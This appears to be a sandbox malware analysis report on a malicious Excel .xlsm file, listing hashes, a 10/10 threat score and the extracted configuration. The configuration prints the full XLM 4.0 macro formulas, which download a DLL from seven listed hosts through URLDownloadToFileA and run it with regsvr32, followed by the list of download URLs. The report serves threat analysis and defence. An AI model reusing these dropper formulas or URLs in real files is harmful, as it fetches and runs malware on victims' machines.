Overview

overview

10

Static

static

10

1d3cdf703f...8.xlsm

windows7-x64

10

1d3cdf703f...8.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    1d3cdf703fa3d5fb83f70a69ae913ddcda0d7f1d4a26cd4ac8203a9f19e05498

  • Size

    20KB

  • Sample

    241120-fneptascql

  • MD5

    4ed529f7ab78c5ab0325baefb7fd147c

  • SHA1

    b4ca75333b89b30e453a3967bcb44b09040ebc3c

  • SHA256

    1d3cdf703fa3d5fb83f70a69ae913ddcda0d7f1d4a26cd4ac8203a9f19e05498

  • SHA512

    b5c3e6c63f41b6cb1cece90c55fc6c4e5c4c81f842c78fe7b78a4487306109d0b6e5f99a76826dabb90d59395cbf50d86ab099afee6c907b628c0df699a77733

  • SSDEEP

    384:6/Vb1GNjU5o4CGzPd6ZIw8R3Kb5CzgObff9kC+xbX7zJBq1:6tINAo4FLkCBn9kC+xbLzJy

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://antaoco.com/wp-admin/5WaIjOuHnUj/

http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/

http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/

http://andrewpharma.com/wp-includes/WqgKtKrYJM/

http://amkltd.co.uk/amk/IPuhx/

http://gees.com.pl/geessw/2YmxITo6/

http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://antaoco.com/wp-admin/5WaIjOuHnUj/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://andrewpharma.com/wp-includes/WqgKtKrYJM/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amkltd.co.uk/amk/IPuhx/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gees.com.pl/geessw/2YmxITo6/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://antaoco.com/wp-admin/5WaIjOuHnUj/
xlm40.dropper

http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/
xlm40.dropper

http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/
xlm40.dropper

http://andrewpharma.com/wp-includes/WqgKtKrYJM/
xlm40.dropper

http://amkltd.co.uk/amk/IPuhx/
xlm40.dropper

http://gees.com.pl/geessw/2YmxITo6/
xlm40.dropper

http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://antaoco.com/wp-admin/5WaIjOuHnUj/
xlm40.dropper

http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/
xlm40.dropper

http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/
xlm40.dropper

http://andrewpharma.com/wp-includes/WqgKtKrYJM/
xlm40.dropper

http://amkltd.co.uk/amk/IPuhx/
xlm40.dropper

http://gees.com.pl/geessw/2YmxITo6/

Targets

    • Target

      1d3cdf703fa3d5fb83f70a69ae913ddcda0d7f1d4a26cd4ac8203a9f19e05498

    • Size

      20KB

    • MD5

      4ed529f7ab78c5ab0325baefb7fd147c

    • SHA1

      b4ca75333b89b30e453a3967bcb44b09040ebc3c

    • SHA256

      1d3cdf703fa3d5fb83f70a69ae913ddcda0d7f1d4a26cd4ac8203a9f19e05498

    • SHA512

      b5c3e6c63f41b6cb1cece90c55fc6c4e5c4c81f842c78fe7b78a4487306109d0b6e5f99a76826dabb90d59395cbf50d86ab099afee6c907b628c0df699a77733

    • SSDEEP

      384:6/Vb1GNjU5o4CGzPd6ZIw8R3Kb5CzgObff9kC+xbX7zJBq1:6tINAo4FLkCBn9kC+xbLzJy

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks